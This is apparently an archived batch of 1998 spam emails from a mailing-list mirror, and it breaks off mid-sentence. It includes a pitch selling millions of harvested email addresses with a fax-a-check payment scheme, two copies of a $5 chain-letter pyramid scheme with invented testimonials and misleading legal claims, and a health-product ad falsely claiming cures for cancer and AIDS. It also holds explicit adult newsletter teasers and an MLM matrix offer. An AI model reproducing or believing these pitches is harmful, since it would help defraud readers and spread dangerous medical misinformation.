 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 10 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 5,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
6 Million+ 

>>> NOW ONLY $150.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.


***ADDED BONUS***
All our customers will have access to our updates on the CD volume
they purchase.  That's right, we continually work on our CD.  Who 
knows when those other CDs were made. We're constantly adding 
and deleting addresses, removes. Etc.  It all comes back to quality.  
No one else offers that! 

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere...PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              800-600-0343  Ext. 2693

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 1A email addresses
for only $150.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-212-504-8192
 

CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-212-504-8192

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-212-504-8192
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.  (7-10 days)
Make payable to: "GD Publishing"
 










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jayson Dias" <master021@email.msn.com>
Date: Sun, 6 Sep 1998 13:02:59 -0700 (PDT)
To: <me2again3@aol.com>
Subject: More $$ than you Can Imagine
Message-ID: <000101bdd9ce$382ff7c0$ae2e2599@oemcomputer>
MIME-Version: 1.0
Content-Type: text/plain


MAKE TONS OF MONEY
FAST AND EASY!!!
This is your chance, don't pass it up

 Please Read...  I have personally tried so many of these (Make money on the
internet) all of these plans have failed and i lost money on them, but this
plan has been making me so much money in so little time... Don't get me
wrong, you have to put forth some effort but it all works out in the end.  I
will stop talking now and let you read how you can make this kind of money
on the internet!!!
You may have to read through this a couple times to understand it, and no
matter what your age, you can still do this as long as you have the internet
and an e-mail account... Read on...



The following is a copy of the e-mail I read which got me started:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEYMAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT AGAIN !!!

You are about to embark on the most profitable and unique program you may
ever see.  Many times over, it has demonstrated and proven its ability to
generate large amounts of cash.  This program is showing fantastic appeal
with a huge and ever-growing on-line population desirous of additional
income.

This is a legitimate, LEGAL, moneymaking opportunity.  It does not require
you to come in personal contact with people, do any hard work, and best of
all, you never have to leave the house, except to get the mail and go to the
bank!

This truly is that lucky break you've been waiting for!  Simply follow the
easy instructions in this letter, and your financial dreams can come true!
When followed correctly, this electronic, multilevel marketing program
WORKS!

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc.,
    -  Even retire!

This is your chance, so don't pass it up!

----------------------------------------------------------------------------
------
OVERVIEW OF THIS EXTRAORDINARY
ELECTRONIC MULTILEVEL MARKETING PROGRAM
----------------------------------------------------------------------------
------

Basically, this is what we do:

We send thousands of people a product that they paid us $5.00 US for, that
costs next to nothing to produce and e-mail back to them.  As with all
multilevel businesses, we build our business by recruiting new partners and
selling our products.  Every state in the U.S. allows you to recruit new
multilevel business online (via your computer).  We are not promising you
anything.  You have to put forth some effort to make this business work, but
come on how hard is emailing!

The products in this program are a series of four business and financial
reports costing $5.00 each.  Each order you receive is to include:

  * $5.00 cash United States Currency
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!
The $5.00 is yours!  This is the EASIEST electronic multilevel marketing
business anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if you
don't order them).

     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose
        name appears on the list next to the report.

     *  When you place your order, make sure you order each of the four
        reports.  You will need all four reports so that you can save them
        on your computer and resell them.

     *  Within a few days you are to receive, via e-mail, each of the four
reports.
         Save them on your computer so they will be accessible for you to
send
         to the 1,000's of people who will order them from you.

2.  IMPORTANT -- DO NOT alter the names of the people who are listed next
     to each report, or their sequence on the list, in any way other than is
     instructed below in steps "a" through "d" or you will lose out on the
     majority of your profits.  Once you understand the way this works,
you'll
     also see how it doesn't work if you change it.  Remember, this method
     has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name and address
         under REPORT #1 with your name and address, moving the one that
         was there down to REPORT #2.

    c.  Move the name and address that was under REPORT #2 down to
         REPORT #3.

    d.  Move the name and address that was under REPORT #3 down to
         REPORT #4.

    e.  The name and address that was under REPORT #4 is removed from
         the list and has NO DOUBT collected large sums of cash!

Please make sure you copy everyone's name and address ACCURATELY!!!

3.  Take this entire letter, including the modified list of names, and save
     it to your computer.  Make NO changes to the instruction portion of
this
     letter.

4.  Now you're ready to start an advertising campaign on the
     WORLDWIDE WEB!  Advertising on the WEB can be very, very inexpensive,
     and there are HUNDREDS of FREE places to advertise.  Another
     avenue which you could use for advertising is e-mail lists.
     You can buy these lists for under $20/2,000 addresses or you
     can pay someone to take care of it for you.
     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them the report
     they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE
     ON ALL ORDERS!  This will help guarantee that the e-mail THEY send out,
     with YOUR name and address on it, will be prompt because they can't
     advertise until they receive the report!  To grow fast be prompt and
courteous.

------------------------------------------
AVAILABLE REPORTS
------------------------------------------
***Order Each REPORT by NUMBER and NAME***

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT
-  ALWAYS SEND YOUR ORDER VIA THE QUICKEST DELIVERY
-  Make sure the cash is concealed by wrapping it in at least two sheets of
paper
-  On one of those sheets of paper, include: (a) the number & name of the
report you are ordering, (b) your e-mail address, and (c) your postal
address.
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTILEVEL SALES"

ORDER REPORT #1 FROM:
            JAYSON DIAS
            4793 Birkdale Cir.
            Fairfield, CA 94585
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTILEVEL SALES"

ORDER REPORT #2 FROM:
            BOBAYAA
            3505 W. Melissa Ln.
            Douglasville, GA 30135
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
            M&J's
            P.O. Box 116
            Whitewater, KS 67154
_________________________________________________________________
REPORT #4 "EVALUATING MULTILEVEL SALES PLANS"

ORDER REPORT #4 FROM:
            TanBsPlace
            P.O. BOX 43365
            Richmond Hights, OH 44143
_________________________________________________________________
----------------------------------------------------------------------------
----------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
----------------------------------------------------------------------------
----------------------

Let's say you decide to start small just to see how well it works.  Assume
your goal is to get 10 people to participate on your first level.  (Placing
a lot of FREE ads on the Internet will EASILY get a larger response.)  Also
assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline
members.  Follow this example to achieve the STAGGERING results below.

First level--your 10 members with
$5...........................................$50
Second level--10 members from those 10 ($5 x 100)..................$500
Third level--10 members from those 100 ($5 x 1,000)..........$5,000
Fourth level--10 members from those 1,000 ($5 x 10,000)...$50,000
                     THIS TOTALS        ----------->$55,550 and more to
come!

Remember friends, this assumes that the people who participate only recruit
10 people each.  Think for a moment what would happen if they got 20 people
to participate!  Lots of people get 100s of participants!  THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can
afford $20).  You obviously already have an Internet connection and e-mail
is FREE!  REPORT#3 shows you the most productive methods for bulk e-mailing
and purchasing e-mail lists.  Some list & bulk e-mail vendors even work on
trade!

About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow
     the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them when
    the orders start coming in because:

    When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S. Postal & Lottery Laws, Title
    18, Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
    also Code of Federal Regs. vol. 16, Sections 255 and 436, which state
    that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow the
    instructions exactly, the results WILL undoubtedly be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

Follow these guidelines to help assure your success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks,
continue advertising until you do.  Then, a couple of weeks later you should
receive at least 100 orders for REPORT #2.  If you don't, continue
advertising until you do.  Once you have received 100 or more orders for
REPORT #2, YOU CAN RELAX, because the system is already working for you, and
the cash can continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of a
DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching which
report people are ordering from you.  If you want to generate more income,
send another batch of e-mails and start the whole process again!  There is
no limit to the income you will generate from this business!

NOTE: If you need help with starting a business, registering a business
name, how income tax is handled, etc., contact your local office of the
Small Business Administration (a Federal agency) for free help and answers
to questions.  Also, the Internal Revenue Service offers free help via
telephone and free seminars about business taxes.  This letter has been
edited to help comply with the Federal Trade Commission requirements.  Any
amounts of earnings listed in this letter can be factual or fictitious.
Your earnings and results are highly dependent on your activities and
advertising.  This letter constitutes no guarantees stated nor implied.  In
the event that it is determined that this letter constitutes a guarantee of
any kind, that guarantee is now void.  If you have any question of the
legality of this letter contact the Office of Associate Director for
Marketing Practices Federal Trade Commission Bureau of Consumer Protection
in Washington, DC.


*******T  E  S  T  I  M  O  N  I  A  L  S*******

     This program does work, but you must follow it EXACTLY!  Especially the
rule of not trying to place your name in a different position, it won't work
and you'll lose a lot of potential income.  I'm living proof that it works.
It really is a great opportunity to make relatively easy money, with little
cost to you.  If you do choose to participate, follow the program exactly,
and you'll be on your way to financial security.
          Sean McLaughlin, Jackson, MS

     My name is Frank.  My wife, Doris, and I live in Bel-Air, MD.  I am a
cost accountant with a major U.S. Corporation and I make pretty good money.
When I received the program I grumbled to Doris about receiving "junk mail."
I made fun of the whole thing, spouting my knowledge of the population and
percentages involved.  I "knew" it wouldn't work.  Doris totally ignored my
supposed intelligence and jumped in with both feet.  I made merciless fun of
her, and was ready to lay the old "I told you so" on her when the thing
didn't work ... well, the laugh was on me!  Within two weeks she had
received over 50 responses.  Within 45 days she had received over $147,200
in $5 bills!  I was shocked!  I was sure that I had it all figured and that
it wouldn't work.  I AM a believer now.  I have joined Doris in her "hobby."
I did have seven more years until retirement, but I think of the "rat race"
and it's not for me.  We owe it all to MLM.
           Frank T., Bel-Air, MD

    I just want to pass along my best wishes and encouragement to you.  Any
doubts you have will vanish when your first orders come in.  I even checked
with the U.S. Post Office to verify that the plan was legal.  It definitely
is!  IT WORKS!
           Paul Johnson, Raleigh, NC

    The main reason for this letter is to convince you that this system is
honest, lawful, extremely profitable, and is a way to get a large amount of
money in a short time.  I was approached several times before I checked this
out.  I joined just to see what one could expect in return for the minimal
effort and money required.  To my astonishment, I received $36,470.00 in the
first 14 weeks, with money still coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks to make up my mind
to participate in this plan.  But conservative that I am, I decided that the
initial investment was so little that there was just no way that I wouldn't
get enough orders to at least get my money back.  Boy, was I surprised when
I found my medium-size post office box crammed with orders!  For a while, it
got so overloaded that I had to start picking up my mail at the window.
I'll make more money this year than any 10 years of my life before.  The
nice thing about this deal is that it doesn't matter where in the U.S. the
people live.  There simply isn't a better investment with a faster return.
         Mary Rockland, Lansing, MI

    I had received this program before.  I deleted it, but later I wondered
if I shouldn't have given it a try.  Of course, I had no idea who to contact
to get another copy, so I had to wait until I was e-mailed another
program...11 months passed then it came...I didn't delete this one!...I made
more than $41,000 on the first try!!
          D. Wilburn, Muncie, IN

     This is my third time to participate in this plan.  We have quit our
jobs, and will soon buy a home on the beach and live off the interest on our
money.  The only way on earth that this plan will work for you is if you do
it.  For your sake, and for your family's sake don't pass up this golden
opportunity.  Good luck and happy spending!
           Charles Fairchild, Spokane, WA

ORDER YOUR REPORTS TODAY AND GET
STARTED ON YOUR ROAD TO
FINANCIAL FREEDOM!!!






































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stocks@smart-stocks.com
Date: Sun, 6 Sep 1998 20:17:06 -0700 (PDT)
To: <cas@toad.com>
Subject: AD: Free Investment Newsletter
Message-ID: <199809070317.UAA07181@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This message is sent in compliance of the new e-mail bill: SECTION 301, 
Paragraph (a)(2)(C) of s. 1618

Sender : Smart-Stocks, P.O. Box 130544, St Paul, MN  55113
Phone  : 1-612-646-8174
E-mail : stocks@smart-stocks.com

To be removed from our mailing list, simply reply with "REMOVE" in the 
subject.

Do you need stock tips?

This is an invitation to join the Smart-Stocks Premier Newsletter for a 
free 90 day trial. We are dedicated to providing comprehensive and 
up-to-date information about emerging growth stocks often overlooked by 
most brokerages and stock market research services. Whether you are a 
seasoned investor or just getting started, The Smart-Stocks Web Site could 
help you discover the next Intel, Blockbuster or Merck long before the 
rest of Wall Street!

To sign up for your free trial newsletter just go to our site at 
http://www.smart-stocks.com

Thank you for your time.
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Me2again3@aol.com
Date: Mon, 7 Sep 1998 01:19:06 -0700 (PDT)
To: MorganJ3@aol.com
Subject: MORE MONEY THAN YOU CAN SPEND!!!
Message-ID: <79fe2d38.35f38fd2@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


WAIT!
Don't Delete this message.  I know what you're probably thinking, but think
again.  This is without a doubt the best way to make money I have ever tried
and you owe it to yourself to at least try it.  You have practically nothing
to lose ( It doesn't even take very much time) and so much to gain.  If you
will read this letter and do exactly as it says, you will soon find that life
is good....very good!


read on!!!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, MONEYMAKING PHENOMENON.
PRINT this letter, read the directions, THEN READ IT AGAIN !!!

You are about to embark on the most profitable and unique program you may ever
see.  Many times over, it has demonstrated and proven its ability to generate
large amounts of cash.  This program is showing fantastic appeal with a huge
and ever-growing on-line population desirous of additional income.

This is a legitimate, LEGAL, moneymaking opportunity.  It does not require you
to come in personal contact with people, do any hard work, and best of all,
you never have to leave the house, except to get the mail and go to the bank!

This truly is that lucky break you've been waiting for!  Simply follow the
easy instructions in this letter, and your financial dreams can come true!
When followed correctly, this electronic, multilevel marketing program WORKS!

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc.,
    -  Even retire!

This is your chance, so don't pass it up!

------------------------------------------------------------------------------
----
OVERVIEW OF THIS EXTRAORDINARY
ELECTRONIC MULTILEVEL MARKETING PROGRAM
------------------------------------------------------------------------------
----

Basically, this is what we do:

We send thousands of people a product that they paid us $5.00 US for, that
costs next to nothing to produce and e-mail back to them.  As with all
multilevel businesses, we build our business by recruiting new partners and
selling our products.  Every state in the U.S. allows you to recruit new
multilevel business online (via your computer).  We are not promising you
anything.  You have to put forth some effort to make this business work, but
come on how hard is emailing!

The products in this program are a series of four business and financial
reports costing $5.00 each.  Each order you receive is to include:

  * $5.00 cash United States Currency
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!
The $5.00 is yours!  This is the EASIEST electronic multilevel marketing
business anywhere!

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if you
don't order them).

     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE        
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
        RETURN POSTAL ADDRESS (in case of a problem) to the person whose  
        name appears on the list next to the report.

     *  When you place your order, make sure you order each of the four   
        reports.  You will need all four reports so that you can save them
        on your computer and resell them.

     *  Within a few days you are to receive, via e-mail, each of the four
reports.
         Save them on your computer so they will be accessible for you to send
         to the 1,000's of people who will order them from you.

2.  IMPORTANT -- DO NOT alter the names of the people who are listed next 
     to each report, or their sequence on the list, in any way other than is
     instructed below in steps "a" through "d" or you will lose out on the
     majority of your profits.  Once you understand the way this works, you'll
     also see how it doesn't work if you change it.  Remember, this method
     has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name and address
         under REPORT #1 with your name and address, moving the one that  
         was there down to REPORT #2.

    c.  Move the name and address that was under REPORT #2 down to        
         REPORT #3.

    d.  Move the name and address that was under REPORT #3 down to        
         REPORT #4.

    e.  The name and address that was under REPORT #4 is removed from     
         the list and has NO DOUBT collected large sums of cash!

Please make sure you copy everyone's name and address ACCURATELY!!!       

3.  Take this entire letter, including the modified list of names, and save
     it to your computer.  Make NO changes to the instruction portion of this
     letter.

4.  Now you're ready to start an advertising campaign on the
     WORLDWIDE WEB!  Advertising on the WEB can be very, very inexpensive,
     and there are HUNDREDS of FREE places to advertise.  Another
     avenue which you could use for advertising is e-mail lists.
     You can buy these lists for under $20/2,000 addresses or you
     can pay someone to take care of it for you.
     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them the report
     they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE
     ON ALL ORDERS!  This will help guarantee that the e-mail THEY send out,
     with YOUR name and address on it, will be prompt because they can't  
     advertise until they receive the report!  To grow fast be prompt and
courteous.

------------------------------------------
AVAILABLE REPORTS
------------------------------------------
***Order Each REPORT by NUMBER and NAME***

Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT
-  ALWAYS SEND YOUR ORDER VIA THE QUICKEST DELIVERY
-  Make sure the cash is concealed by wrapping it in at least two sheets of
paper
-  On one of those sheets of paper, include: (a) the number & name of the
report you are ordering, (b)
your e-mail address, and (c) your postal address.
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTILEVEL SALES"

ORDER REPORT #1 FROM:
	Me2Again3
	4205 NE 130th AVE.
	Vancouver, WA. 98682
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTILEVEL SALES"

ORDER REPORT #2 FROM
             JAYSON DIAS
            4793 Birkdale Cir.
            Fairfield, CA 94585
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
            BOBAYAA
	3505 W. Melissa Ln.
	Douglasville, GA 30135
_________________________________________________________________
REPORT #4 "EVALUATING MULTILEVEL SALES PLANS"

ORDER REPORT #4 FROM:
            :M&J's
            P.O. Box 116
            Whitewater, KS
_________________________________________________________________
------------------------------------------------------------------------------
--------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
------------------------------------------------------------------------------
--------------------

Let's say you decide to start small just to see how well it works.  Assume
your goal is to get 10 people
to participate on your first level.  (Placing a lot of FREE ads on the
Internet will EASILY get a larger
response.)  Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10
downline
members.  Follow this example to achieve the STAGGERING results below.    

First level--your 10 members with
$5...........................................$50
Second level--10 members from those 10 ($5 x 100)..................$500   
Third level--10 members from those 100 ($5 x 1,000)..........$5,000       
Fourth level--10 members from those 1,000 ($5 x 10,000)...$50,000
                     THIS TOTALS        ----------->$55,550 and more to come!

Remember friends, this assumes that the people who participate only recruit 10
people each.  Think for a moment what would happen if they got 20 people to
participate!  Lots of people get 100s of participants!  THINK ABOUT IT!   

Your cost to participate in this is practically nothing (surely you can afford
$20).  You obviously already have an Internet connection and e-mail is FREE!
REPORT#3 shows you the most productive methods for bulk e-mailing and
purchasing e-mail lists.  Some list & bulk e-mail vendors even work on
trade!

About 50,000 new people get online every month!

*******TIPS FOR SUCCESS*******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow     
     the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them when      
    the orders start coming in because:

    When you receive a $5 order, you MUST send out the requested
    product/report to comply with the U.S. Postal & Lottery Laws, Title   
    18, Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
    also Code of Federal Regs. vol. 16, Sections 255 and 436, which state 
    that "a product or service must be exchanged for money received."     

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow the        
    instructions exactly, the results WILL undoubtedly be SUCCESSFUL!     

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

Follow these guidelines to help assure your success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks, continue
advertising until you do.  Then, a couple of weeks later you should receive at
least 100 orders for REPORT #2.  If you don't, continue advertising until you
do.  Once you have received 100 or more orders for REPORT #2, YOU CAN RELAX,
because the system is already working for you, and the cash can continue to
roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of a
DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching which
report people are ordering from you.  If you want to generate more income,
send another batch of e-mails and start the whole process again! There is no
limit to the income you will generate from this business!

NOTE: If you need help with starting a business, registering a business name,
how income tax is handled, etc., contact your local office of the Small
Business Administration (a Federal agency) for free help and answers to
questions.  Also, the Internal Revenue Service offers free help via telephone
and free seminars about business taxes.  This letter has been edited to help
comply with the Federal Trade
Commission requirements.  Any amounts of earnings listed in this letter can be
factual or fictitious.  Your earnings and results are highly dependent on your
activities and advertising.  This letter constitutes no guarantees stated nor
implied.  In the event that it is determined that this letter constitutes a
guarantee of any kind, that guarantee is now void.  If you have any question
of the legality of this letter
contact the Office of Associate Director for Marketing Practices Federal Trade
Commission Bureau of consumer Protection in Washington, DC.

*******T  E  S  T  I  M  O  N  I  A  L  S*******

     This program does work, but you must follow it EXACTLY!  Especially the
rule of not trying to place your name in a different position, it won't work
and you'll lose a lot of potential income.  I'm living proof that it works



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Mon, 7 Sep 1998 12:16:27 -0700 (PDT)
To: (STUFFED MONDAY SEPTEMBER 7 1998)
Subject: Bruise Cruise: New charter liner offers harsh reception/Grave Throbbing: Cemetary sex
Message-ID: <19980907071001.28854.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Our Photo Editor had a field day today selecting a
superb  bunch of  pics for  you.  So surf  over to
Stuffed now, and enjoy today's hot extravaganza!

 + PAGE 2 'SPREAD'
  + THUMBNAIL HEAVEN
   + GOOD F**K CHARM
    + SEXY STORY: "MY BEST FRIEND"
     + THE VERY BEST OF EUREKA!
      + CLITTY CLITTY BANG BANG
       + SUPER SEXY SURPRISE THUMBS
        + THUMBNAIL ORGY
         + ULTRA HI-RES POSTER PIC
          + LOADS AND LOADS MORE STUFF!

- Happy Labor Day!

       ---->   http://stuffed.net/98/9/7/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/7/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watch34@usa.net
Date: Sun, 6 Sep 1998 21:30:47 -0700 (PDT)
To: watch34@usa.net
Subject: Two most exciting BREAKTHROUGHS in health Science in the 20th century!
Message-ID: <199809071429.JAA24854@paknet2.ptc.pk>
MIME-Version: 1.0
Content-Type: text/plain



Subject: TWO Most Exciting BREAKTHROUGHS in
                Health Science in the  20TH CENTURY
   
ONE:  AGE REVERSING MIRACLE---
  Medical Science  PROVES it is now possible to REVERSE 10 TO 20
  YEARS of AGING in as little as  6  MONTHS.
  This PRODUCT releases the only substance in the body which has been
  Clinically Proven   to decrease wrinkles, increase energy, lose fat-gain
  muscle, improve vision, re-grow hair, restore sex drive, reduce cholesterol
  regenerate heart, liver, lungs, kidneys, prostate---and the list goes on---
 
TWO:  IMMUNE SYSTEM BUILDER---Fights COLDS to CANCERS
  NOW--An aternative to the overused antibiotics and other synthetic drugs-
  A natural product that boosted immune systems by an ave.of 1,267 %
  in one study group of over 100 people.
  * All types of Cancer--- in Remission
  *CFS Patients--Recovered and Feeling Great
  *Relief from Allergies--Colds--Flu
  *Even relief from Lupus--Aids--Hepatitus
  20 Years and 20 Million Dollars in Research to bring this Product
  to the Public.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
For Complete Details on the Products and/or the Huge Financial
Opportunity with a Very Minimal Investment--CALL 1-800-896-8991
Leave your name and number--We can then provide Recorded Calls,
Websites, Brochures, Tapes and etc.
              SJC Solutions  1292 Seven Springs Cir.  Marietta  GA  30068
                     To be removed from future mailings, please provide your E-mail address




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Mon, 7 Sep 1998 02:01:58 -0700 (PDT)
To: (Recipient list suppressed)
Subject: One Nation's Primary Industry Policy
Message-ID: <1.5.4.32.19980907090341.008d8474@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW

Pauline Hanson's One Nation has just released its Primary Industry policy.

Please view:

http://www.gwb.com.au/onenation/policy/dpi.html

for details

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Tue, 8 Sep 1998 04:33:40 -0700 (PDT)
To: (STUFFED TUESDAY SEPTEMBER 8 1998)
Subject: Man arrested while screwing Pumpkin/Couple caught screwing in monkey cage
Message-ID: <19980908071001.16643.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


PLUS YOU GET 30+ FREE HI-RES JPEGS - AND...

 + PAGE 2 'SPREAD' - GORGEOUS GAL
  + WILD THUMBS - 10 JPEGS
   + THUMBNAIL HEAVEN - 10 MORE JPEGS
    + SEXY STORY: "HOME FOR BREAKFAST"
     + SEXY SURPRISE THUMBS - ANOTHER 10 JPEGS
      + STRIP CLUB SAFETY MANUAL - FASCINATING FEATURE
       + THE VERY BEST OF EUREKA! - HOT SITES
        + ULTRA HI-RES POSTER PIC - SAVE IT, PRINT IT
         + LOADS AND LOADS MORE STUFF - CHECK IT OUT!

- Have fun!

       ---->   http://stuffed.net/98/9/8/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/8/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: noldcosts@usa.net
Date: Mon, 7 Sep 1998 22:10:30 -0700 (PDT)
To: noldcosts@usa.net
Subject: You Can Now Have A Free Cellular Phone!
Message-ID: <199809080511.HAA09289@mailhost.axime.com>
MIME-Version: 1.0
Content-Type: text/plain





When you enter our fantastic lead program (only $99 plus $35 setup fee
onetime)  and complete a 2 x 2 forced matrix you will recieve 
$100 plus as a bonus a Nokia 6160 digital cellular phone with 600 minutes
of service on the #1 cellular carrier in the United States
(THIS OFFER IS GOOD IN ALL 50 STATES OF THE UNITED STATES OF AMERICA)

When all 6 sales within your matrix have been completed, you will earn
